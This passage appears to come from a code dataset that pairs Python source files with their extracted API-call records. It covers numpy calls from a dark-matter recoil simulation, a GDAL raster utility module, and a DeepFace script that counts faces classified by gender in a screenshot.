'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7063, 7083), 'numpy.zeros', 'zeros', ([], {'shape': '(np, 3)'}), '(shape=(np, 3))\n', (7068, 7083), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((9112, 9142), 'numpy.linspace', 'linspace', (['E_min', 'E_max', '(ne + 1)'], {}), '(E_min, E_max, ne + 1)\n', (9120, 9142), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((9157, 9183), 'numpy.linspace', 'linspace', (['(0.0)', '(1.0)', '(nc + 1)'], {}), '(0.0, 1.0, nc + 1)\n', (9165, 9183), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((9473, 9505), 'numpy.meshgrid', 'meshgrid', (['E_r_edges', 'costh_edges'], {}), '(E_r_edges, costh_edges)\n', (9481, 9505), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((10003, 10033), 'numpy.linspace', 'linspace', (['E_min', 'E_max', '(ne + 1)'], {}), '(E_min, E_max, ne + 1)\n', (10011, 10033), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((10044, 10070), 'numpy.linspace', 'linspace', (['(0.0)', '(1.0)', '(ne + 1)'], {}), '(0.0, 1.0, ne + 1)\n', (10052, 10070), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((10085, 10116), 'numpy.linspace', 'linspace', (['(0.0)', '(1.0)', '(nc_fine + 1)'], {}), '(0.0, 1.0, nc_fine + 1)\n', (10093, 10116), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((10320, 10341), 'numpy.zeros', 'zeros', ([], {'shape': '(ne, ne)'}), '(shape=(ne, ne))\n', (10325, 10341), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((11923, 11953), 'numpy.linspace', 'linspace', (['E_min', 'E_max', '(ne + 1)'], {}), '(E_min, E_max, ne + 1)\n', (11931, 11953), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12016, 12046), 'numpy.meshgrid', 'meshgrid', (['E_o_edges', 'E_o_edges'], {}), '(E_o_edges, E_o_edges)\n', (12024, 12046), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((12054, 12090), 'numpy.sqrt', 'sqrt', (['(1.0 / A_CR * 1.0 / (I / S + 1))'], {}), '(1.0 / A_CR * 1.0 / (I / S + 1))\n', (12058, 12090), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12558, 12579), 'numpy.zeros', 'zeros', ([], {'shape': '(ne, ne)'}), '(shape=(ne, ne))\n', (12563, 12579), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((2184, 2196), 'numpy.log10', 'log10', (['(200.0)'], {}), '(200.0)\n', (2189, 2196), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((2313, 2333), 'numpy.array', 'array', (['[Jan1 + 67.0]'], {}), '([Jan1 + 67.0])\n', (2318, 2333), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((2415, 2446), 'LabFuncs.efficiency', 'LabFuncs.efficiency', (['Nuc', 'Efine'], {}), '(Nuc, Efine)\n', (2434, 2446), False, 'import LabFuncs\n'), ((3034, 3043), 'numpy.sqrt', 'sqrt', (['(2.0)'], {}), '(2.0)\n', (3038, 3043), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3174, 3205), 'LabFuncs.FormFactorHelm', 'LabFuncs.FormFactorHelm', (['E_r', 'A'], {}), '(E_r, A)\n', (3197, 3205), False, 'import LabFuncs\n'), ((3681, 3696), 'numpy.zeros', 'zeros', ([], {'shape': 'ne'}), '(shape=ne)\n', (3686, 3696), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5153, 5184), 'LabFuncs.FormFactorHelm', 'LabFuncs.FormFactorHelm', (['E_r', 'A'], {}), '(E_r, A)\n', (5176, 5184), False, 'import LabFuncs\n'), ((5491, 5547), 'LabFuncs.LabVelocity', 'LabFuncs.LabVelocity', (['t[i]', 'Loc', 'HaloModel.RotationSpeed'], {}), '(t[i], Loc, HaloModel.RotationSpeed)\n', (5511, 5547), False, 'import LabFuncs\n'), ((7113, 7129), 'numpy.size', 'size', (['costh_vals'], {}), '(costh_vals)\n', (7117, 7129), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7143, 7157), 'numpy.zeros', 'zeros', ([], {'shape': 'n'}), '(shape=n)\n', (7148, 7157), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((1329, 1360), 'numpy.sqrt', 'sqrt', (['(1.0 / (2 * m_N_keV * E_r))'], {}), '(1.0 / (2 * m_N_keV * E_r))\n', (1333, 1360), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3529, 3585), 'LabFuncs.LabVelocity', 'LabFuncs.LabVelocity', (['t[0]', 'Loc', 'HaloModel.RotationSpeed'], {}), '(t[0], Loc, HaloModel.RotationSpeed)\n', (3549, 3585), False, 'import LabFuncs\n'), ((4729, 4737), 'numpy.shape', 'shape', (['E'], {}), '(E)\n', (4734, 4737), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5393, 5402), 'numpy.size', 'size', (['E_r'], {}), '(E_r)\n', (5397, 5402), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5890, 5900), 'numpy.shape', 'shape', (['E_r'], {}), '(E_r)\n', (5895, 5900), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((6018, 6126), 'numpy.exp', 'exp', (['(-(v_min[v_min + vlabdotq < v_esc] + vlabdotq[v_min + vlabdotq < v_esc]) **\n 2.0 / (2 * sig_v ** 2.0))'], {}), '(-(v_min[v_min + vlabdotq < v_esc] + vlabdotq[v_min + vlabdotq < v_esc]) **\n 2.0 / (2 * sig_v ** 2.0))\n', (6021, 6126), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((6243, 6282), 'numpy.exp', 'exp', (['(-v_esc ** 2.0 / (2 * sig_v ** 2.0))'], {}), '(-v_esc ** 2.0 / (2 * sig_v ** 2.0))\n', (6246, 6282), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7809, 7823), 'numpy.size', 'size', (['E_r_vals'], {}), '(E_r_vals)\n', (7813, 7823), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7837, 7853), 'numpy.size', 'size', (['costh_vals'], {}), '(costh_vals)\n', (7841, 7853), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7867, 7888), 'numpy.zeros', 'zeros', ([], {'shape': '(nc, ne)'}), '(shape=(nc, ne))\n', (7872, 7888), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12117, 12125), 'numpy.shape', 'shape', (['C'], {}), '(C)\n', (12122, 12125), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12651, 12766), 'numpy.array', 'array', (['[E[i, j], E[i, j + 1], E[i + 1, j], E[i + 1, j + 1], E[i, j], E[i, j + 1],\n E[i + 1, j], E[i + 1, j + 1]]'], {}), '([E[i, j], E[i, j + 1], E[i + 1, j], E[i + 1, j + 1], E[i, j], E[i, j +\n 1], E[i + 1, j], E[i + 1, j + 1]])\n', (12656, 12766), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12771, 12886), 'numpy.array', 'array', (['[C[i, j], C[i, j + 1], C[i + 1, j], C[i + 1, j + 1], C[i, j], C[i, j + 1],\n C[i + 1, j], C[i + 1, j + 1]]'], {}), '([C[i, j], C[i, j + 1], C[i + 1, j], C[i + 1, j + 1], C[i, j], C[i, j +\n 1], C[i + 1, j], C[i + 1, j + 1]])\n', (12776, 12886), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12891, 12966), 'numpy.array', 'array', (['[0, 0, 0, 0, dR[i, j], dR[i, j + 1], dR[i + 1, j], dR[i + 1, j + 1]]'], {}), '([0, 0, 0, 0, dR[i, j], dR[i, j + 1], dR[i + 1, j], dR[i + 1, j + 1]])\n', (12896, 12966), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3753, 3809), 'LabFuncs.LabVelocity', 'LabFuncs.LabVelocity', (['t[i]', 'Loc', 'HaloModel.RotationSpeed'], {}), '(t[i], Loc, HaloModel.RotationSpeed)\n', (3773, 3809), False, 'import LabFuncs\n'), ((3952, 3962), 'scipy.special.erf', 'erf', (['(x + y)'], {}), '(x + y)\n', (3955, 3962), False, 'from scipy.special import erf\n'), ((3961, 3971), 'scipy.special.erf', 'erf', (['(x - y)'], {}), '(x - y)\n', (3964, 3971), False, 'from scipy.special import erf\n'), ((3987, 3999), 'numpy.exp', 'exp', (['(-z ** 2)'], {}), '(-z ** 2)\n', (3990, 3999), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((4033, 4039), 'scipy.special.erf', 'erf', (['z'], {}), '(z)\n', (4036, 4039), False, 'from scipy.special import erf\n'), ((4040, 4050), 'scipy.special.erf', 'erf', (['(x - y)'], {}), '(x - y)\n', (4043, 4050), False, 'from scipy.special import erf\n'), ((4072, 4084), 'numpy.exp', 'exp', (['(-z ** 2)'], {}), '(-z ** 2)\n', (4075, 4084), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5430, 5439), 'numpy.size', 'size', (['E_r'], {}), '(E_r)\n', (5434, 5439), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5951, 5978), 'numpy.sqrt', 'sqrt', (['(2 * pi * sig_v ** 2.0)'], {}), '(2 * pi * sig_v ** 2.0)\n', (5955, 5978), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7287, 7309), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (7291, 7309), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7340, 7362), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (7344, 7362), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7425, 7447), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (7429, 7447), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7478, 7500), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (7482, 7500), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((11192, 11235), 'numpy.linspace', 'linspace', (['E_r_edges[j]', 'E_r_edges[j + 1]', '(5)'], {}), '(E_r_edges[j], E_r_edges[j + 1], 5)\n', (11200, 11235), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((13019, 13042), 'numpy.column_stack', 'column_stack', (['(x, y, z)'], {}), '((x, y, z))\n', (13031, 13042), False, 'from numpy import nan, isnan, column_stack, amin, amax\n'), ((7279, 7286), 'numpy.cos', 'cos', (['ph'], {}), '(ph)\n', (7282, 7286), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((7332, 7339), 'numpy.sin', 'sin', (['ph'], {}), '(ph)\n', (7335, 7339), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((7417, 7424), 'numpy.cos', 'cos', (['ph'], {}), '(ph)\n', (7420, 7424), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((7470, 7477), 'numpy.sin', 'sin', (['ph'], {}), '(ph)\n', (7473, 7477), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((11345, 11362), 'numpy.sqrt', 'sqrt', (['(smin / A_CR)'], {}), '(smin / A_CR)\n', (11349, 11362), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((11361, 11378), 'numpy.sqrt', 'sqrt', (['(smax / A_CR)'], {}), '(smax / A_CR)\n', (11365, 11378), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((13066, 13115), 'scipy.spatial.ConvexHull', 'ConvexHull', (['points'], {'qhull_options': '"""W1e-15 E1e-15"""'}), "(points, qhull_options='W1e-15 E1e-15')\n", (13076, 13115), False, 'from scipy.spatial import ConvexHull\n'), ((3975, 3983), 'numpy.sqrt', 'sqrt', (['pi'], {}), '(pi)\n', (3979, 3983), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((4054, 4062), 'numpy.sqrt', 'sqrt', (['pi'], {}), '(pi)\n', (4058, 4062), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((8058, 8080), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (8062, 8080), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((8115, 8137), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (8119, 8137), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7578, 7592), 'numpy.ones', 'ones', ([], {'shape': 'np'}), '(shape=np)\n', (7582, 7592), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((7693, 7707), 'numpy.ones', 'ones', ([], {'shape': 'np'}), '(shape=np)\n', (7697, 7707), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8050, 8057), 'numpy.cos', 'cos', (['ph'], {}), '(ph)\n', (8053, 8057), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8107, 8114), 'numpy.sin', 'sin', (['ph'], {}), '(ph)\n', (8110, 8114), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8501, 8523), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (8505, 8523), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((8562, 8584), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (8566, 8584), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((8220, 8234), 'numpy.ones', 'ones', ([], {'shape': 'np'}), '(shape=np)\n', (8224, 8234), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8493, 8500), 'numpy.cos', 'cos', (['ph'], {}), '(ph)\n', (8496, 8500), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8554, 8561), 'numpy.sin', 'sin', (['ph'], {}), '(ph)\n', (8557, 8561), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8681, 8695), 'numpy.ones', 'ones', ([], {'shape': 'np'}), '(shape=np)\n', (8685, 8695), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n')]
# -*- coding: utf-8 -*- """ Copyright (c) 2020-2022 INRAE Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ """Classes for basic raster and array manipulation""" import osgeo from osgeo import gdal, osr import numpy as np # ---------------------------------------------------- Helpers --------------------------------------------------------- def gdal_open(filename): """ Read an image as numpy array """ gdal_ds = gdal.Open(filename) if gdal_ds is None: raise Exception("Unable to open file {}".format(filename)) return gdal_ds def read_as_np(filename): """ Read a raster image as numpy array """ gdal_ds = gdal_open(filename) return gdal_ds.ReadAsArray() def set_gdal_cachemax(gdal_cachemax): """ Set GDAL_CACHEMAX """ gdal.SetConfigOption("GDAL_CACHEMAX", gdal_cachemax) def get_sub_arr(np_arr, patch_location, patch_size, ref_patch_size): """ Get the np.array :param np_arr: the numpy array, either edge_stats_fn or clouds_stats_fn :param patch_location: patch location (new_elem, y) :param patch_size: patch size (single value) it will set the size of the returned sub array, wrt the ref_patch_size :param ref_patch_size: reference patch size (single value) :return: the sub array """ scale = int(patch_size / ref_patch_size) return np_arr[scale * patch_location[1]:scale * (patch_location[1] + 1), scale * patch_location[0]:scale * (patch_location[0] + 1)] def save_numpy_array_as_raster(ref_fn, np_arr, out_fn, scale=1.0): """ Save a numpy array into a raster file :param ref_fn: reference raster (output will have the same proj, geotransform, size) :param np_arr: numpy array :param out_fn: output filename for the raster :param scale: output pixel spacing scaling """ gdal.AllRegister() in_ds = gdal_open(ref_fn) driver = in_ds.GetDriver() out_ds = driver.Create(out_fn, np_arr.shape[1], np_arr.shape[0], 1, gdal.GDT_Int32) out_band = out_ds.GetRasterBand(1) out_band.WriteArray(np.transpose(np_arr), 0, 0) out_band.FlushCache() geotransform = in_ds.GetGeoTransform() # Update if we want to change pixel spacing if scale != 1.0: geotransform = list(geotransform) geotransform[1] *= scale geotransform[5] *= scale geotransform = tuple(geotransform) out_ds.SetGeoTransform(geotransform) out_ds.SetProjection(in_ds.GetProjection()) def convert_to_4326(coordinates, gdal_ds): """ Convert some coordinates to 4326 :param coordinates: (x, y) coordinates, expressed in the coordinate system of the dataset `gdal_ds` :param gdal_ds: gdal dataset :return: """ # Get the coordinate system of the dataset initial_crs = osr.SpatialReference() initial_crs.ImportFromWkt(gdal_ds.GetProjectionRef()) # Set up the coordinate reference system, WGS84 crs_4326 = osr.SpatialReference() if int(osgeo.__version__[0]) >= 3: # GDAL 3 changes axis order: https://github.com/OSGeo/gdal/issues/1546 crs_4326.SetAxisMappingStrategy(osgeo.osr.OAMS_TRADITIONAL_GIS_ORDER) crs_4326.ImportFromEPSG(4326) # create a transform object to convert between coordinate systems transform = osr.CoordinateTransformation(initial_crs, crs_4326) # Transform the coordinates in lat long lon, lat, _ = transform.TransformPoint(*coordinates) return lon, lat
[ "osgeo.osr.CoordinateTransformation", "numpy.transpose", "osgeo.gdal.SetConfigOption", "osgeo.gdal.Open", "osgeo.osr.SpatialReference", "osgeo.gdal.AllRegister" ]
[((1412, 1431), 'osgeo.gdal.Open', 'gdal.Open', (['filename'], {}), '(filename)\n', (1421, 1431), False, 'from osgeo import gdal, osr\n'), ((1776, 1828), 'osgeo.gdal.SetConfigOption', 'gdal.SetConfigOption', (['"""GDAL_CACHEMAX"""', 'gdal_cachemax'], {}), "('GDAL_CACHEMAX', gdal_cachemax)\n", (1796, 1828), False, 'from osgeo import gdal, osr\n'), ((2826, 2844), 'osgeo.gdal.AllRegister', 'gdal.AllRegister', ([], {}), '()\n', (2842, 2844), False, 'from osgeo import gdal, osr\n'), ((3779, 3801), 'osgeo.osr.SpatialReference', 'osr.SpatialReference', ([], {}), '()\n', (3799, 3801), False, 'from osgeo import gdal, osr\n'), ((3928, 3950), 'osgeo.osr.SpatialReference', 'osr.SpatialReference', ([], {}), '()\n', (3948, 3950), False, 'from osgeo import gdal, osr\n'), ((4268, 4319), 'osgeo.osr.CoordinateTransformation', 'osr.CoordinateTransformation', (['initial_crs', 'crs_4326'], {}), '(initial_crs, crs_4326)\n', (4296, 4319), False, 'from osgeo import gdal, osr\n'), ((3057, 3077), 'numpy.transpose', 'np.transpose', (['np_arr'], {}), '(np_arr)\n', (3069, 3077), True, 'import numpy as np\n')]
import face_recognition from deepface import DeepFace import cv2 import numpy as np from tensorflow.keras.preprocessing import image import pyscreenshot as ImageGrab model = "" def preprocess_img(img, target_size=(224,224)): img = cv2.resize(img, target_size) img_pixels = image.img_to_array(img) img_pixels = np.expand_dims(img_pixels, axis = 0) img_pixels /= 255 #normalize input in [0, 1] return img_pixels def grab_screenshot(): im = ImageGrab.grab() return im def recog_gender(img_file=None, image=None): global model if model == "": # only need to build the model for the first time model = DeepFace.build_model("Gender") if img_file: image = face_recognition.load_image_file(img_file) face_locations = face_recognition.face_locations(image) #print("I found {} face(s) in this photograph.".format(len(face_locations))) count_man = 0 count_woman = 0 for face_location in face_locations: top, right, bottom, left = face_location # print("A face is located at pixel location Top: {}, Left: {}, Bottom: {}, Right: {}".format(top, left, bottom, right)) face_image = image[top:bottom, left:right] face_image = preprocess_img(img=face_image) gender_predictions = model.predict(face_image)[0,:] if np.argmax(gender_predictions) == 0: count_woman += 1 elif np.argmax(gender_predictions) == 1: count_man += 1 return count_man, count_woman if __name__ == '__main__': count_man, count_woman = recog_gender(img_file="sample_zoom_screenshot.png") print("man:", count_man, "woman:", count_woman )
[ "numpy.argmax", "pyscreenshot.grab", "tensorflow.keras.preprocessing.image.img_to_array", "numpy.expand_dims", "deepface.DeepFace.build_model", "face_recognition.face_locations", "face_recognition.load_image_file", "cv2.resize" ]
[((237, 265), 'cv2.resize', 'cv2.resize', (['img', 'target_size'], {}), '(img, target_size)\n', (247, 265), False, 'import cv2\n'), ((283, 306), 'tensorflow.keras.preprocessing.image.img_to_array', 'image.img_to_array', (['img'], {}), '(img)\n', (301, 306), False, 'from tensorflow.keras.preprocessing import image\n'), ((324, 358), 'numpy.expand_dims', 'np.expand_dims', (['img_pixels'], {'axis': '(0)'}), '(img_pixels, axis=0)\n', (338, 358), True, 'import numpy as np\n'), ((466, 482), 'pyscreenshot.grab', 'ImageGrab.grab', ([], {}), '()\n', (480, 482), True, 'import pyscreenshot as ImageGrab\n'), ((775, 813), 'face_recognition.face_locations', 'face_recognition.face_locations', (['image'], {}), '(image)\n', (806, 813), False, 'import face_recognition\n'), ((647, 677), 'deepface.DeepFace.build_model', 'DeepFace.build_model', (['"""Gender"""'], {}), "('Gender')\n", (667, 677), False, 'from deepface import DeepFace\n'), ((711, 753), 'face_recognition.load_image_file', 'face_recognition.load_image_file', (['img_file'], {}), '(img_file)\n', (743, 753), False, 'import face_recognition\n'), ((1326, 1355), 'numpy.argmax', 'np.argmax', (['gender_predictions'], {}), '(gender_predictions)\n', (1335, 1355), True, 'import numpy as np\n'), ((1404, 1433), 'numpy.argmax', 'np.argmax', (['gender_predictions'], {}), '(gender_predictions)\n', (1413, 1433), True, 'import numpy as np\n')]